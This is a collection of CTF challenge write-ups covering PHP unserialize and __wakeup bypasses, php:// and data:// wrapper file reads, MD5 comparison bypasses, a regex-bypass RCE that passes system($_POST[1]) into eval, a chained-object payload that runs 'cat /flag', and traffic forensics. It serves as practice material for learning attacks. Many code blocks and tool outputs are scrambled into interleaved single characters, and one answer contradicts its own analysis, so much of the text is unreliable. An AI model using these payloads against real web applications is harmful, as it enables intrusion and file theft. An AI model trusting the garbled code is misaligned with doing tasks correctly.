[BJDCTF 2020]just a rar

Downloading the attachment gives a RAR archive; the hint says its password is four digits.

Brute-forcing the password is straightforward.

Viewing the image metadata with exiftool gives:

E F D F F F F F F F M J R X Y E X P I I E B C Y I M x i i i i i i i i i I F e x P a m m n i o m e e i l r l l l l l l l M I s R R i d a a c t l C a g x f e e e e e e e e e E F o e e f C d g g o s o b g a i T c l s s o i e e d r e p f o N t S M A I P T T T V u o o B m n i P C i t o a o i o c n e y y y e t l l y m g W H n e C r S x o l m r z d c o r p p p r i u u t e i e g r o i e o e y e i e d m e e e s o t t e n d i m S z l l V f s e i i n i i t t g P S p u e s e i s s E o o o O h h r a o b f r c C s x n U n n r t o m n l s a D h i t n d c p e S a i t a a o e i e e l n a g o i t n n n t r s e t m . n o e g s s s s p j n / e i l p N T o i g u D i D n n m a m a g b t e t e e e r / / T T i i m m e e : : : : : : : : : : : : : : : : : : : : : : : : : : 1 f . 1 2 2 2 - J j i 1 i 1 1 B f ( 5 8 B 8 3 Y 5 0 2 l 0 0 0 0 r P p m . n i l B 8 6 a C 8 . . a 5 1 2 2 w E g a 0 c g a i 0 8 s b 0 5 9 g 6 4 4 - G g 1 h - g n e C x 0 6 . k : : : r e e e { a l r 8 3 j B 0 0 0 - / s n W r i 4 6 p 7 9 9 - j d a y n : 8 g : : : r p i d e 2 2 1 1 - e a f d : 7 7 7 - g n _ a D 0 1 t C 0 1 1 ( 2 a T ( 9 1 1 M 3 , 2 : : : o } 2 4 0 0 t 0 H 2 0 0 0 o 6 u ) : : : r 0 f 1 0 0 o f 0 6 5 l b m + + + a y a 0 0 0 , t n 8 8 8 e : : : M s c 0 0 0 M , o 0 0 0 ) d u i s n e g - b o p t i o n t o e x t r a c t )

flag{Wadf_123}

[陇剑杯 2021]ios (question 7)

An iOS security researcher's phone was compromised while connected to the internet at home; not only was data stolen, some bitcoin was lost as well. Analyse the traffic and the logs and answer: the attacker accessed/attacked several servers on the internal network, with IP addresses **____**. (Sort multiple IPs from smallest to largest and separate them with #, e.g. 127.0.0.1#192.168.0.1.) Submit the resulting flag in NSSCTF{} format.

The attachment contains a log file, a keylog file and a pcap.

Opening the capture, the traffic is TLS-encrypted as expected. Go to Edit, Preferences, Protocols, TLS, import the keylog file, and the capture refreshes automatically.

Filtering for TLS traffic, an IP 192.168.1.8 shows up, so add it to the filter:

ip.src==192.168.1.8 && tls

A large amount of blind SQL injection traffic is visible.

That confirms the first IP. Browsing further showed no other suspicious traffic, and the log file does not contain the .8 address either; on closer inspection, .3 accessed an upload file whose target IP is 172.28.0.2, so there is more than one attacker IP.

So the victim IPs are 172.28.0.2#192.168.1.12, and the flag is flag{172.28.0.2#192.168.1.12}

[SWPUCTF 2021 新生赛]no_wakeup

There was actually another deserialization challenge before this one; its code is as follows:

<?php

error_reporting(0);
show_source("index.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

The logic is simple: all that is needed is to set the two fields,

$s=new wllm();
echo $s->admin="admin";
echo $s->passwd="ctf";
echo serialize($s);

and that is it; no need to go into detail.

no_wakeup

This one requires bypassing __wakeup.

<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

    public function __wakeup(){
        $this->passwd = sha1($this->passwd);
    }

    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "wllm"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->passwd;
            echo "No wake up";
        }
    }
}

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>

As can be seen, __wakeup is called during unserialization and its job is to replace passwd with its sha1 hash, so it has to be bypassed.

A search online shows that when the declared property count is greater than the real number of properties, __wakeup() is skipped.

[ZJCTF 2019]NiZhuanSiWei

Open the challenge and the source is displayed:

<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

So the first step is to find a way to make this true:

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

It requires the content read from text to equal welcome to the zjctf, which a pseudo-protocol (stream wrapper) can provide:

data://text/plain,welcome to the zjctf

That gets past the if. Following the code, it checks the file name for the string flag and, if it is absent, includes the file directly.

But useless.php cannot simply be passed in: because it is loaded with include, the PHP would be executed as code. Again a pseudo-protocol does the job: php://filter/convert.base64-encode/resource= brings the file out base64-encoded.

Decoding gives the code:

<?php
class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>

The magic method here is __tostring(), which runs automatically when the object is output, so how to construct the serialized object is clear:

<?php
class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
$a=new Flag();
$a->file="flag.php";
echo serialize($a);
?>

Then just view the page source.

[SWPU 2024 新生引导]Ser1

The code:

< h e c } c } c } $ u ? ? i r l l l a n > p g r a a a = s h h o s s s $ e p l r s p p p } s p p p } s p p p } _ r i _ u u u u u u u u u G i g r s b b b s b b b s b b b E a h e t l l l t l l l t l l l T l t p e i i i e e i i i $ e i i i e [ i _ o p c c c c p c c c t p c c c v ' z f r 0 h t h t a C e i t n $ $ f o w $ $ f i h $ $ f l T ( l i e M O u 0 z y u s r h a u ( F $ e n { a m n $ { a e n - 3 a m n $ ' a ( g n o c t b d c > 3 j i c t ] ) _ ( b g t h u a t z { i l t h ; ; _ 0 o e i i z y i a m u i i F ) ; l o s a e o b i o o s I ; i n - b d n u ; s n - L ; > u a z i > E M ; ; a ; h _ _ a _ b _ a _ d n t u c j ) e b o - a i ; s o s > l m t ; t m l i r / r a ( ) u / i n $ ; c n b m t M g o e ( a ( ( t ) n ) ) h { b { ; o o / d / , z $ a a s b r t u g e z s p a ) t b { w u 0 s t 使 e p e t c h h r o 3 3 _ _ t o s t r i n g ( ) m a n b o c a l l

Look at the first part: __destruct() runs when the object is destroyed; the second, __tostring(), runs when the object is output as a string; the third, __call(), handles a call to a method that does not exist on the object.

So the logic emerges: assign a steptw0 object to Manbo so that the echo triggers __tostring(), then assign a stepthr33 object to zabuzabu; the earlier output triggers a call, and since the manbo method does not exist, __call is invoked.

$ $ $ $ e s s s s c t t t t h e e e e o p p p p 0 0 0 0 s n n n n e e e e e r - - - i = > > > a M M M l n a a a i e n n n z w b b b e o o o ( s - - $ t = > > s e z z t p n a a e 0 e b b p n w u u 0 e z z n ( s a a e ) t b b ) ; e u u ; p - t = > w h 0 n a ( e j ) w i ; m s i t e = p t ' h s r y 3 s 3 t ( e ) m ; ( " c a t / f l a g " ) ; ' ;

[陇剑杯 2023]hard_web_1

The point tested is Wireshark usage.

It asks which ports the server has open; the server here should be 162.180.

So just filter for the SYN-ACKs the server returns to the client:

ip.dst==192.168.162.188 and tcp.flags.ack==1 and tcp.flags.syn==1

flag{80,888,8888}

[SWPUCTF 2022 新生赛]ez_ez_unserialize

Code:

< c { } ? l p a h s p s p f { } f { } f { } u u u u X b n n n l c c c i t $ t i } t h c i t i f i i / o h o o g f $ n i n ( n h l x s $ $ l a - t t i g = _ > _ h h _ g c x w i i d h i o a s s e t s _ n = k - - s _ F s e > > t f i I t $ u x x r i n L r x p u l E u ; ( ! = c e f _ c ) = t ( l _ t / = ( $ l ; ( / _ ) t l $ F / h l x _ I / i l ) F L s l / I E - a / L _ > g E _ x . _ ; ) p _ ; h ) p {

At a glance the member to modify is x, but there is a __wakeup() that checks whether x equals __FILE__ and reassigns it if it does not.

https://blog.csdn.net/m0_73512445/article/details/132513838

This method can bypass it: change the property count so that it no longer matches. It has a CVE, CVE-2016-7124.

<?php $flag="NSSCTF{e651ea49-6569-4778-8cbc-c47b698e2a9d}";
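Added example, not from the original write-up: a Python parser for PHP serialize() output that flags objects whose declared property count differs from the properties actually present, which is the shape of the __wakeup() bypass (CVE-2016-7124) used in both no_wakeup and ez_ez_unserialize above. The class name wllm and both sample strings are constructed for the demonstration; the real fix is a patched PHP and never unserializing untrusted input.

```python
"""Flag PHP serialize() payloads whose declared property count is wrong.
Handles the subset seen in these challenges: N, b, i, d, s, a, O."""


class PhpUnserializeError(ValueError):
    pass


class PhpSerializedParser:
    def __init__(self, data: str):
        self.data = data
        self.pos = 0
        self.mismatches = []  # (class name, declared count, actual count)

    def _take(self, expected: str) -> None:
        if not self.data.startswith(expected, self.pos):
            raise PhpUnserializeError(f"expected {expected!r} at offset {self.pos}")
        self.pos += len(expected)

    def _until(self, delim: str) -> str:
        end = self.data.find(delim, self.pos)
        if end < 0:
            raise PhpUnserializeError(f"missing {delim!r} after offset {self.pos}")
        token, self.pos = self.data[self.pos:end], end + 1
        return token

    def _quoted(self, length: int) -> str:
        # Strings are length-prefixed, so nothing is escaped inside the quotes.
        self._take('"')
        value = self.data[self.pos:self.pos + length]
        if len(value) != length:
            raise PhpUnserializeError("string shorter than its declared length")
        self.pos += length
        self._take('"')
        return value

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise PhpUnserializeError("trailing data after value")
        return value

    def _value(self):
        if self.pos >= len(self.data):
            raise PhpUnserializeError("unexpected end of input")
        tag = self.data[self.pos]
        self.pos += 1
        if tag == "N":
            self._take(";")
            return None
        self._take(":")
        if tag == "b":
            return self._until(";") == "1"
        if tag == "i":
            return int(self._until(";"))
        if tag == "d":
            return float(self._until(";"))
        if tag == "s":
            value = self._quoted(int(self._until(":")))
            self._take(";")
            return value
        if tag == "a":
            count = int(self._until(":"))
            self._take("{")
            items = {}
            for _ in range(count):
                key = self._value()
                items[key] = self._value()
            self._take("}")
            return items
        if tag == "O":
            name = self._quoted(int(self._until(":")))
            self._take(":")
            declared = int(self._until(":"))
            self._take("{")
            props = {}
            # Read up to the closing brace instead of trusting the declared count;
            # the gap between the two numbers is exactly what the bypass relies on.
            while not self.data.startswith("}", self.pos):
                key = self._value()
                props[key] = self._value()
            self._take("}")
            if declared != len(props):
                self.mismatches.append((name, declared, len(props)))
            return {"__class__": name, "properties": props}
        raise PhpUnserializeError(f"unsupported tag {tag!r} at offset {self.pos - 1}")


def wakeup_bypass_attempts(payload: str):
    """Return (class, declared, actual) for every object with a wrong count."""
    parser = PhpSerializedParser(payload)
    parser.parse()
    return parser.mismatches


# Constructed samples shaped like the wllm class from the first challenge above.
BENIGN = 'O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}'
BYPASS = 'O:4:"wllm":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}'
```

Running wakeup_bypass_attempts over inbound payloads in a request log gives a cheap detection signal for this bypass pattern, including when the mismatched object is nested inside another one.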

POP chain 2

Solution

c } c } c } $ $ $ $ $ $ $ e u l l l n n n n n n n c n a a a 1 2 3 1 2 3 3 h s s s s - - - - o e s v f } s v f } s v v f } f } = = = > > > > r a u a u a a u u n n n r s i N r n N r n N r r n n n n n a a a e e a S c S c S c c e e e m m m s r l S $ t e S $ t e S $ $ t $ t i } w w w e e e i i 1 n i c 2 n i c 3 n r i t i f a z a o h a o h a e h N N N = = = = l e { m n o { m n o { m s n 3 i n 4 ( S S S i ( e e e ; . s . $ e S S S $ $ $ ' z $ ; $ ; $ 访 ; - t c 1 2 3 n n n n e _ _ t _ t $ _ 访 > _ h h ( ( ( 2 3 3 s ( G d h t h t g n c i o ) ) ) ; ; ; s $ E e i o i h e a a s ; ; ; c n T s s S s $ i t m l - g t 1 [ t - t - t s ( e l > e f ) ' r > r > h - $ - ( r t ' ; n u n i n i > n $ > $ e e ; ' c a n a s n a t g n s n ] t m g m - a m h e a v ) ( e ( e > m e i t m = ( ; ) ; ) - n e ) s f e g = ' > a { - l , e = F { { t m $ > a t L e e t n g $ f ' A s - N h a ( a l n G t > S i m ) r a s ' ; t S s e ; g g s ) 1 e 3 - - u ( c ; . s > > m ) t t t g e f 2 e e n ' . s t t ) $ t f s t l ) { $ h a { t i g h s ( i - ) _ s > c - n a > a l n m l a 使 e _ m - g e > e _ t t c e a s l t l N S S 3 : : _ _ g e t ( ' t e s t ' )

The chain:

N N N N S S S S S S S S 1 2 3 3 : : : : : : : : _ _ _ _ _ _ _ _ d t g c e o e a s S t l t t ( l r r ' ( u i t ' c n e g t g s e ( ( t t ) ) ' f ) l a g ' e e ) c c $ h h t o o h i $ $ s i t t - f h h > i i n ( s s a $ - - m r > > e e n n - s a a > m m g = e e e = - t = > f t l ' e a n N s g s S t ( s S ) c 2 t : f : ' _ N ) _ S N t S S e o 3 S c S : 3 h t : : o r _ : i _ _ g n g _ e g e c t ( t a e ) ( l n ' l v t ( ( e ' ' s g F t e L ' t A ) f G l ' a ) g ; ' )

[HUBUCTF 2022 新生赛]checkin

<?php
show_source(__FILE__);
$username = "this_is_secret";
$password = "this_is_not_known_to_you";
include("flag.php");//here is your flag
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";
}
?>

Deserialization; the first instinct is to modify user and pass to get through.

But when flag is included, those two values get modified.

if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";
}

The key point is here:

A double equals can be bypassed with true:

<?php
$info=array("username"=>true,"password"=>true);
echo serialize($info);

[第五空间 2021]pklovecloud

Deserialization; this one feels a step up in difficulty.

<?php
include 'flag.php';
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}

class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new pkshow;
    }
    function __toString()
    {
        if (isset($this->cinder))
            return $this->cinder->echo_name();
    }
}

class ace
{
    public $filename;
    public $openstack;
    public $docker;
    function echo_name()
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}

if (isset($_GET['pks']))
{
    $logData = unserialize($_GET['pks']);
    echo $logData;
}
else
{
    highlight_file(__file__);
}
?>

First the goal: here it is to read a target file, and the key point lies at

file_get_contents($file);

and at one if condition:

$this->openstack->neutron === $this->openstack->nova

Moving to the other class, the entry point is __toString(), triggered by the echo $logData; at the bottom.

So the first stage is

$a=new acp();
serialize($a);

which triggers $this->cinder = new pkshow;; changing that completes the second stage:

$this->cinder = new ace;

So what gets triggered now is echo_name() in ace. Back in ace, what remains to solve is $this->openstack->neutron === $this->openstack->nova, the point that held me up longest: it unserializes the content of docker, $this->openstack = unserialize($this->docker);, so setting docker to null is enough.

The first solution:

< i c { } c { } c { } $ $ $ e i { } ? ? n l l l a b b c f > p c a a a - h h l s s s = = > o ( p u s f { } s p p p f { } f { } s p p p f { } d i $ e d u r u u u u u u u u n n o u s l c e p n a o b b n n a b b b n e e c r s o h k c c t l l c c c l l l c w w k l e g o ' s t r p e i i t $ t i e i i i t $ $ i { } e e t D f h i e c c c i t i f c c c i t t f a a r n ( a $ l o o t t o h o o h h ( c c = c $ t l a w n u / e $ $ n i n ( $ $ $ n i i $ p e n o _ a o g r d n n s i r f o d s s t $ i { } e { } ( ( u d G g . e n e o - s e i p o e - - h f f l ) ) l e E = D p c $ u v _ > _ s t l e c c > > i i s ; ; l ( T a h h " c t a c c t e u e n k h o o s l ( e ; s [ u t p o P i r ; o i o t r n s e o p p - e f r r e ' n a ' _ k n o n n S ( n a t r _ e e > i e e r p s ; ; n d n s d t $ m a ; n n n o = l t t i k e a v e ; t e r t $ e c a s s p e u u a s r m e r r r i h t k m t t e " _ r r l ' i e r ; u n i h = ; e a a n . g n n i ] a ( y c = g s i ( c c s / e z ) l ) t ( - s " ) k k t { t f " e ) i s / ( n ) > - . - a $ _ i k ( z a ) e c > . = > c t c l e $ e f w i c / n k h o e y a ( e / n i n u e - i n _ s ) $ ^ / a d n s n u > s t g t ) _ . n c e d s s t n - e e o ; G ^ e e r e c e r e > n t n E " w ; ) r t r o u f t _ e T ; ) - f i n t i s c [ > a a r l ( o l ' e s l = o e $ n o p c d i n n f t s k h a z $ a i e t s o s e h = m l n ~ ' _ d ( e = e e t " ] n f $ a = } ) s ; ) a l t t " ) ( ; m a h ; $ ; $ e g i t f ( " s h i ) ; - i l ; > s e d - ) / o > ; c o k p e e / r n ) s ; t a c / k f - l > a n g o v a d ) o c k e r d o c k e r a c p

[NSSRound#16 Basic]RCE但是没有完全RCE

It is split into two stages.

< e h i i } } ? r i n f p r g c e h o h l ( l p r l u i i } } s e _ i d s f e c r g e s e h e h ( e l { o p t ' t ( i } } s e o _ l ( s f e c " r f e $ t e h t i v _ r ( l { o i l e G i i e s e n e l E n s c e c " g ( 2 T g s h h ( _ . [ ) e o { o 0 _ p ' $ t M ) f h m _ ( $ " D ; i p d G $ l 5 l ' 5 E _ e ~ e ) _ T P v " _ ; 1 [ O e ; _ ' ' S l ) ] m T 2 ; ) d [ ; 5 ' " & _ m ; & 1 d ' 5 i ] _ s 3 s ! ' e = ] t = ) ( & $ ( & _ s m G t d " E r 5 ; T i ( [ n $ ' g _ m ) P d $ O 5 _ S _ G T 2 E [ ' T ' ] [ m ) ' d ) m 5 d _ { 5 3 _ ' 2 ] ' ) ] = & = & m m d d 5 5 ( ( $ $ _ _ P G O E S T T [ [ ' ' m m d d 5 5 _ _ 1 3 ' ' ] ] ) ) ) = = { = m d 5 ( $ _ G E T [ ' m d 5 _ 2 ' ] ) ) {

Look at the code first:

(string)$_GET['md5_1'] !== (string)$_GET['md5_2']

These are required to differ.

md5($_GET['md5_1']) === md5($_GET['md5_2'])

The md5 values are required to be strictly equal, so a genuine collision is needed; it can be generated with fastcoll and then URL-encoded.


Stage two

< e h $ $ i } e ? r i s c f v p r g h m ( a h o h e d p l p r l l r d ( _ i l = e i $ r g g e s e h = $ _ ( h p t _ m " e o _ $ G a H l r f _ E t a l t i P T c c ( i l O [ h k $ n e S ' ( e c g ( T c ' r m ( _ [ m / ! d 0 _ ' d f ! ) ) F s ' ! ) ; I h ] l ! ; L e ; | ! E l a ! _ l | ! _ ' g ! ) ] | " ; ; \ ) * ; | \ ? / i ' , $ c m d ) ) {

There is a very interesting solution here:

/ s 3 h z e _ l R l C = 3 u . r p l h d p e ? c c o m d d e = & s 1 y = s c t a e t m ( / $ f _ l P a O g S T [ 1 ] ) ;

After this, what ends up inside eval looks like

eval(urldecode(system($_POST[1])));

This makes the regex check meaningless; rather clever.

[CISCN 2023 华北]ez_date

Read the code first:

<?php
highlight_file(__FILE__);
error_reporting(0);

class date{
    public $a;
    public $b;
    public $file;
    public function __wakeup()
    {
        if(is_array($this->a)||is_array($this->b)){
            die('no array');
        }
        if( ($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b)) ){
            $content=date($this->file);
            $uuid=uniqid().'.txt';
            file_put_contents($uuid,$content);
            $data=preg_replace('/((\s)*(\n)+(\s)*)/i','',file_get_contents($uuid));
            echo file_get_contents($data);
        }
    }
}

unserialize(base64_decode($_GET['data']));

By experiment, the comparison ($this->a !== $this->b) can be passed by using a string and a number with the same value:

if(1 !== "1" && md5("1") === md5(1)) TRUE

Then it is easy to notice that the key is date: file passes through date() once. Searching online, the solution is

/f\l\a\g

Test:

echo date("/f\l\a\g");

payload:

< e c } $ $ $ $ e ? ? r l x x x x / c > p r a x x x x u h h o s x x x x n o p r s p p p p { } - - - s _ u u u u = > > > e b r d b b b b a b f r a e a l l l l n i i s p t i i i i e = = l b a e o e c c c c w 2 " e a l 6 r ; 2 s i 4 t { $ $ $ f d " = e z _ i a b f u a ; " 6 e e n ; ; i n t / 4 ( n g l c e f b c ( e t ( \ a o 0 ; i ) l s d ) o ; \ e e ; n a 6 ( \ 4 s g $ _ e _ " _ d r w ; G e i a E c a k T o l e [ d i u ' e z p c ( e ( o " ( ) d T $ e z x ' o x ] 0 x O ) i ) J ; k Y X R l I j o z O n t z O j E 6 I m E i O 3 M 6 M T o i M i I 7 c z o x O i J i I j t p O j E 7 c z o 0 O i J m a W x l I j t z O j Q 6 I m Z s Y W c i O 3 0 = " ) ) ;

[安洵杯 2019]JustBase

A base64 variant; nothing difficult.

First, the encoded text:

V G h l I G d l b @ x v Z # k g b @ Y g d G h l I E V h c n R o J # M g c # V y Z m F j Z S B p c y B k b @ ! p b m F ) Z W Q g Y n k g d G h l I H B h c n R p Y # V s Y X I g c H J v c G V y d G l l c y B v Z i B # Y X R l c i $ g U H J l c @ V u d C B v b i B F Y X J ) a C B p b i B z b @ x p Z C w g b G l x d W l k L C B h b m Q g Z @ F z Z W ( ! c y B z d G F ) Z X M s I H d h d G V y I G l z I G V $ Y @ V w d G l v b m F s b H k g c m V h Y # R p d m U u I E l ) I G R p c # N v b H Z l c y w g d H J h b n N w b # J ) c y w g Y W % k I H B y Z W N p c G l ) Y X R l c y B t Y W % % I G N o Z W ! p Y @ F s I G N v b X B v d W % k c y B h b m Q g a X M g Y @ ( u c # R h b n R s e S B t b @ R p Z n l p b m c g d G h l I G Z h Y @ U g b @ Y g d G h l I E V h c n R o L i B F d m F w b # J h d G V k I G Z y b @ ) g d G h l I G ( j Z W F u c y w g d @ F ) Z X I g d m F w b # I g Z m ( y b X M g Y @ x v d W R z L C B z b @ ! l I G ( m I H d o a W N o I G F y Z S B ) c m F u c # B v c n R l Z C B i e S B # a W % k I G ( @ Z X I g d G h l I G N v b n R p b m V u d H M u I E N v b m R l b n N h d G l v b i B m c m ( t I H R o Z S B j b G ( ! Z H M g c H J v d m l k Z X M g d G h l I G V z c @ V u d G l h b C B h Z @ V u d C B v Z i B j b @ % ) a W % l b n R h b C B l c m ( z a W ( u O i B y Y W l u L l R o Z S B y Y X R l I G F ) I H d o a W N o I G E g b W ( s Z W N ! b G U g b @ Y g d @ F ) Z X I g c G F z c @ V z I H R o b # V n a C B ) a G U g Y # l j b G U g a X M g b m ( ) I H J h b m R v b Q p B b m Q g d G h l I G Z s Y W c g a X M ^ I E N U R n s y M i ! R V ) V S V F l V S U * t U E x L S k h H R k R T L U F a W E N W Q k % N f Q = =

It ends with equals signs, so guess base64; although many of the characters are not in the base64 alphabet, try decoding it in CyberChef first.

Try decoding after replacing the characters ! through ):

i t x c p m a o r p b = d i o l e n r e } " t t V = ( = G c b h o a { ' l d s ! I . e e ' ' G j ) 6 : : d o 4 l i ' ' b n 1 6 @ ( ' ' x t , , v a Z b ' ' # l @ & k e ' ' g . : : b g @ e ' ' Y t 2 7 g ( ' ' d c , , G h h a ' l r # I , ' ' E c : : V h h a ' ' c r 3 8 n ) ' ' R , , o f J o ' # r $ M ' ' g c : : c h # a ' ' V r 4 9 y ' ' Z i , , m n F ' j x % Z ) ' ' S : : B p ' ' c 5 0 y ' ' B , k b @ ! p b m F ) Z W Q g Y n k g d G h l I H B h c n R p Y # V s Y X I g c H J v c G V y d G l l c y B v Z i B # Y X R l c i $ g U H J l c @ V u d C B v b i B F Y X J ) a C B p b i B z b @ x p Z C w g b G l x d W l k L C B h b m Q g Z @ F z Z W ( ! c y B z d G F ) Z X M s I H d h d G V y I G l z I G V $ Y @ V w d G l v b m F s b H k g c m V h Y # R p d m U u I E l ) I G R p c # N v b H Z l c y w g d H J h b n N w b # J ) c y w g Y W % k I H B y Z W N p c G l ) Y X R l c y B t Y W % % I G N o Z W ! p Y @ F s I G N v b X B v d W % k c y B h b m Q g a X M g Y @ ( u c # R h b n R s e S B t b @ R p Z n l p b m c g d G h l I G Z h Y @ U g b @ Y g d G h l I E V h c n R o L i B F d m F w b # J h d G V k I G Z y b @ ) g d G h l I G ( j Z W F u c y w g d @ F ) Z X I g d m F w b # I g Z m ( y b X M g Y @ x v d W R z L C B z b @ ! l I G ( m I H d o a W N o I G F y Z S B ) c m F u c # B v c n R l Z C B i e S B # a W % k I G ( @ Z X I g d G h l I G N v b n R p b m V u d H M u I E N v b m R l b n N h d G l v b i B m c m ( t I H R o Z S B j b G ( ! Z H M g c H J v d m l k Z X M g d G h l I G V z c @ V u d G l h b C B h Z @ V u d C B v Z i B j b @ % ) a W % l b n R h b C B l c m ( z a W ( u O i B y Y W l u L l R o Z S B y Y X R l I G F ) I H d o a W N o I G E g b W ( s Z W N ! b G U g b @ Y g d @ F ) Z X I g c G F z c @ V z I H R o b # V n a C B ) a G U g Y # l j b G U g a X M g b m ( ) I H J h b m R v b Q p B b m Q g d G h l I G Z s Y W c g a X M ^ I E N U R n s y M i ! R V ) V S V F l V S U * t U E x L S k h H R k R T L U F a W E N W Q k % N f Q = = "
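Added example, not from the original write-up: a Python decoder for this base64 variant, in which the digits 0-9 have been replaced by the symbols on the shifted number keys, so ! through ) map back to 1 through 0. The sample string is constructed from the base64 of a plain sentence, not the challenge ciphertext.

```python
"""Decode 'JustBase': base64 with digits swapped for their Shift+key symbols."""
import base64
import string

# Index i holds the symbol produced by Shift+<digit i> on a US keyboard,
# which is the mapping the write-up settles on (! -> 1 ... ( -> 9, ) -> 0).
SHIFTED = ")!@#$%^&*("
_TO_DIGIT = {sym: str(i) for i, sym in enumerate(SHIFTED)}
_TO_SYMBOL = {str(i): sym for i, sym in enumerate(SHIFTED)}
_B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def looks_like_justbase(text: str) -> bool:
    """Heuristic from the write-up: '=' padding only at the end, and every
    character is base64 or one of the ten shifted symbols."""
    body = text.rstrip("=")
    if "=" in body or not body:
        return False
    return set(body) <= (_B64_ALPHABET | set(SHIFTED)) and any(c in SHIFTED for c in body)


def justbase_decode(text: str) -> bytes:
    """Map shifted symbols back to digits, validate the alphabet, base64-decode."""
    restored = "".join(_TO_DIGIT.get(ch, ch) for ch in text)
    bad = sorted(set(restored) - _B64_ALPHABET)
    if bad:
        raise ValueError(f"characters outside the base64 alphabet after mapping: {bad}")
    return base64.b64decode(restored, validate=True)


def justbase_encode(data: bytes) -> str:
    """Inverse transform, used to build test vectors offline."""
    return "".join(_TO_SYMBOL.get(ch, ch) for ch in base64.b64encode(data).decode())


# Constructed sample: plain base64 of b"hello flag 2024" is "aGVsbG8gZmxhZyAyMDI0";
# applying 8 -> * and 0 -> ) gives the variant form below.
SAMPLE = "aGVsbG*gZmxhZyAyMDI)"
```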

[SWPUCTF 2021 新生赛]PseudoProtocols

Tests pseudo-protocols.

http://node7.anna.nssctf.cn:23011/index.php?wllm=

The first thing to try is of course file:///flag

That does not work; try the php wrapper:

http://node7.anna.nssctf.cn:23011/index.php?wllm=php://filter/convert.base64-encode/resource=hint.php

Following the hint, read the hint.php file:

<?php
//go to /test2222222222222.php
?>

<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

Reading the code, the key is if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'). Since user input goes straight into file_get_contents, consider the data pseudo-protocol:

data://text/plain,I want flag

That gives the flag.

[BJDCTF 2020]easy_md5

select * from 'admin' where password=md5($pass,true)

ffifdyop can be used to bypass it.

if ($a != $b && md5($a) == md5($b))

0e can be used to bypass it.

if ($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2']))

Arrays can be used to bypass it.

param1[]=asd&param2[]=asdw

[GWCTF 2019]枯燥的抽奖

Random-number prediction; brute force works too.

Prediction

< # h s i } m $ $ $ f } $ e i } s ? e e f t s s l o s c f h p a s ( _ t t e r t h ( o h d s ! s r r n r o i w p e i i $ r _ = 1 ( $ _ s i } e } _ r o s _ a l ' = s s " s f l s ( n s S n o ' 2 $ t h < e ( s o " _ e E d n ; 0 i r o p t $ e u C s t S ( g ; . w ( _ e { e r o t ( S $ 1 = = i $ P c c c n a $ I _ s = d _ O h h e t r _ O S = 0 u = P S o o ( e t S N E ; b s ' O T " n ( E [ S " s u p S [ " " c t ) S ' S a $ t b 1 T ' < < h - ; S s I b i r s ' [ n p p e T I e O c ( t > ' u c y O e N d < $ r " n m i i k p N d [ e s ( . u ' d d . e [ ' ' f $ t $ $ m ] = = p : ' ] s g l r s s ' = f f h s = e h e _ t t ] = l l p t e r e i n l r r ) = a a " e e a d j 1 o , _ ) $ g g ) x d n ' k ; n s { s > > ; t ' d ] l g 0 h t / ] ( ) m $ 1 , o r h ) 0 ; n i , w ) t ) , + 1 . { m { 9 p + m 0 " l 9 / q t ) < ; 9 r ) _ ; / c 9 s { r p h 9 t a > a 9 u n " < r 9 v / d ; / s 9 w ( p e 9 x 0 > t ) y 2 , " = ; z 0 ; u 0 s f t 1 t l f / 2 r a - 3 l g 8 4 e { " 5 n x ) 6 ( x ; 7 $ x 8 s x 9 t x A r x B _ x C l x D o x E n } F g < G 1 / H ) p I > J - " K ; L 1 M ) N , O P 1 Q ) R ; S T U / V W X Y l Z a " n ; g 1 s t r l e n ( $ s t r _ l o n g 1 ) - 1

Code

What has to be predicted is

if(!isset($_SESSION['seed'])){
